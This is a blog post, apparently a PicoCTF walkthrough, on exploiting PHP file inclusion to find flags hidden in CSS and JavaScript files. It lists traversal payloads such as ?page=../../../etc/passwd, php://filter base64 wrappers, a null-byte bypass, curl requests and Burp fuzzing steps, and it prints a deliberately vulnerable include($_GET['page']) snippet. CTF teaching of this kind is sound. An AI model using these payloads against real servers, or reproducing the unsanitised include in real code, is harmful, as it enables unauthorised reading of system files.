Monday, July 7, 2025

PicoCTF On Includes – Exploiting File Inclusion Vulnerabilities

 Introduction 

File inclusion vulnerabilities in CTF competitions often hide flags in files that many overlook. While many participants concentrate on system files like /etc/passwd, the real treasure might be found in web application files such as CSS and JavaScript. This guide highlights a specific CTF challenge pattern where the flag is concealed in /style.css and /script.js files. 

PicoCTF file inclusion vulnerability walkthrough

The Challenge Pattern

Understanding the Setup 

In many CTF web challenges, you will encounter a file inclusion vulnerability where the application includes files based on user input: 

```php 

<?php 

$page = $_GET['page']; 

include($page); 

?> 

``` 

The Hidden Asset Strategy 

While most players immediately try: 

```

?page=../../../etc/passwd 

?page=../../../flag.txt 

?page=config.php 

``` 

The real flag might be hiding in plain sight within the web application's own files. 


Target Files: style.css and script.js 


Why These Files? 

style.css and script.js are ideal hiding spots because: 

- They are real web application files 

- Most attackers skip them, thinking they are harmless 

- They can contain comments with flags 

- They are often readable through file inclusion 

- They do not trigger security filters 

 

Common Locations 

/style.css 

/css/style.css 

/assets/css/style.css 

/static/css/style.css 

./style.css 

 

/script.js 

/js/script.js 

/assets/js/script.js 

/static/js/script.js 

./script.js 

 

Exploitation Techniques 

Direct File Inclusion 

```

?page=style.css 

?page=script.js 

?page=./style.css 

?page=./script.js 

``` 

 

Directory Traversal to Web Root 

```

?page=../style.css 

?page=../script.js 

?page=../../style.css 

?page=../../script.js 

``` 

 

Using PHP Wrappers 

```

?page=php://filter/convert.base64-encode/resource=style.css 

?page=php://filter/convert.base64-encode/resource=script.js 

``` 

This technique is useful when: 

- The files might be processed as PHP 

- You need to see the raw content 

- Special characters are being filtered 

 

Flag Hiding Patterns 

In CSS Comments 

```css 

/* FLAG{css_files_can_hide_secrets} */ 

body { 

    background-color: #f0f0f0; 

    font-family: Arial, sans-serif; 

} 

 

.header { 

    /* Another common spot: FLAG{hidden_in_css_rules} */ 

    background: url('data:image/svg+xml;base64,RkxBR3toaWRkZW5faW5fYmFzZTY0fQ=='); 

} 

``` 

 

In JavaScript Comments 

```javascript 

// FLAG{javascript_comments_are_goldmines} 

function validateForm() { 

    var flag = "FLAG{stored_in_js_variables}"; 

    // TODO: Remove this flag before production 

    return true; 

} 

 

/* 

Multi-line comment with flag: 

FLAG{multiline_comments_work_too} 

*/ 

``` 

 

Encoded in CSS/JS 

```css 

/* Base64 encoded flag in CSS */ 

.flag::before {  

    content: "RkxBR3tlbmNvZGVkX2luX2Nzc30="; /* FLAG{encoded_in_css} */ 

} 

``` 

```javascript 

// ROT13 encoded flag 

var secret = "SYNT{ebg13_rapbqrq_va_wf}"; // FLAG{rot13_encoded_in_js} 

``` 

 

Systematic Approach 


1. Identify the Include Vulnerability 

   First, confirm you have file inclusion: 

   ```

   ?page=index.php  # Should work 

   ?page=nonexistent.php  # Should error 

   ``` 

2. Check for Web Assets 

   Try the most common web files: 

   ```

   ?page=style.css 

   ?page=script.js 

   ?page=main.css 

   ?page=app.js 

   ``` 

3. Explore Different Paths 

   # Current directory 

   ```

   ?page=./style.css 

   ?page=./script.js 

   ``` 

   # Parent directories 

   ```

   ?page=../style.css 

   ?page=../script.js 

   ``` 

   # Common web directories 

   ```

   ?page=css/style.css 

   ?page=js/script.js 

   ?page=assets/style.css 

   ?page=static/script.js 

   ``` 

4. Use PHP Wrappers if Needed 

```

?page=php://filter/convert.base64-encode/resource=style.css 

?page=php://filter/convert.base64-encode/resource=script.js 

``` 

 

Tools and Techniques 


Manual Testing with curl 

```bash 

# Test direct inclusion 

curl "http://target.com/vuln.php?page=style.css" 

curl "http://target.com/vuln.php?page=script.js" 

 

# Test with different paths 

curl "http://target.com/vuln.php?page=../style.css" 

curl "http://target.com/vuln.php?page=css/style.css" 

``` 

Using Browser Developer Tools 

- Open the challenge page normally 

- Check the Network tab for loaded CSS/JS files 

- Note the file paths 

- Try including those same files through the vulnerability 

 

Burp Suite Integration 

- Send the vulnerable request to Repeater 

- Create a list of common asset filenames 

- Use Burp's Intruder to fuzz the page parameter 

- Look for successful responses with different content 

 

Common File Variations 

CSS Files 

- style.css 

- main.css 

- app.css 

- theme.css 

- custom.css 

- bootstrap.css 

- styles.css 

 

JavaScript Files 

- script.js 

- main.js 

- app.js 

- custom.js 

- jquery.js 

- bootstrap.js 

- scripts.js 

 

Real CTF Example 

Challenge Setup 

```php 

<?php 

$page = $_GET['page'] ?? 'home'; 

include($page . '.php'); 

?> 

``` 

Solution Path 

- Notice the .php extension is automatically added 

- Try: ?page=style.css (becomes style.css.php) 

- Try: ?page=style.css%00 (null byte, older PHP) 

- Try: ?page=../style.css (directory traversal) 

- Success with: ?page=../style.css%00 

 

Flag Location 

```css 

/* /style.css */ 

body { 

    margin: 0; 

    padding: 0; 

    /* FLAG{css_inclusion_ftw} */ 

} 

``` 

 

Pro Tips 

1. Check Both Files 

   Always check both CSS and JS files. Flags might be split between them or one might be a distraction. 

2. Look for Patterns 

```css 

/* Part 1: FLAG{this_is_only_ */ 

/* Part 2: half_of_the_flag} */ 

``` 

3. Decode Everything 

   Look for base64, hex, or other encoded strings in the files. 

4. Check File Timestamps 

   Sometimes the modification time provides hints about which files were changed recently. 

 

Quick Reference 

Essential Payloads 

```

?page=style.css 

?page=script.js 

?page=../style.css 

?page=../script.js 

?page=css/style.css 

?page=js/script.js 

?page=php://filter/convert.base64-encode/resource=style.css 

?page=php://filter/convert.base64-encode/resource=script.js 

``` 

Flag Search Patterns 

- Look for FLAG{ in comments 

- Check for base64 encoded strings 

- Search for unusual CSS properties or JS variables 

- Examine data URIs in CSS 

 

Conclusion 

Don't overlook the obvious. While system files get a lot of attention in file inclusion challenges, web application assets like CSS and JavaScript files can be treasure troves for hidden flags. They are real files that don't trigger security alarms but may hold valuable information. 

The key lesson is to always examine style.css and script.js when you face file inclusion vulnerabilities in CTF challenges. Other participants often miss these files, giving you a competitive edge. 

Remember, in CTF competitions, the simplest solution is often the correct one, and flags tend to hide in plain sight.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

HashCrack Challenge Writeup

  HashCrack Challenge Writeup Challenge Overview Challenge Name: hashcrack Difficulty: Beginner/Intermediate Category: Cryptography ...